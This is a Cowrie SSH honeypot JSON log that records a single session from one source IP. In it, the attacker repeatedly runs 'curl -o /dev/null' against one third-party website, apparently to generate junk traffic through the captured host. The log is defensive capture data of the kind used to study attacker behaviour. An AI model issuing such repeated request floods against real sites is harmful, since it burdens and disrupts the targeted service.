{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.116964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.117872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.156289Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.157450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.195738Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.196712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.233957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.235280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.349129Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.350365Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.443924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.444998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.482570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.483808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.522047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.523141Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.560328Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.561382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.598263Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.599362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.636871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.637814Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.677138Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.678262Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.715916Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.716851Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.755539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.756594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.797827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.799031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.838446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.839528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.877430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.878458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.935715Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.936713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.001494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.002478Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.058316Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.059370Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.097465Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.098745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.139427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.140364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.179402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.180291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.217094Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.217974Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.257723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.258894Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.309755Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.310605Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.355381Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.356314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.393873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.394789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.432539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.433395Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.470181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.471273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.508031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.509094Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.548749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.550011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.587393Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.588430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.627787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.628779Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.668885Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.670000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.709964Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.710912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.748450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.749757Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.786255Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.787262Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.834147Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.835111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.872985Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.874109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.911075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.911937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.951984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.953051Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:02.992000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:02.993688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.030496Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.031512Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.068655Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.069632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.115891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.117113Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.158848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.159800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.196888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.197788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.235419Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.236873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.273765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.274887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.311701Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.312565Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.353360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.354562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.411721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.412775Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.511945Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.512821Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.552797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.553958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.591470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.592746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.630173Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.631072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.668608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.669762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.710038Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.710928Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.760084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.761005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.799950Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.801160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.856526Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.857413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:03.898444Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:03.899487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.074132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:04.075455Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:04.112911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
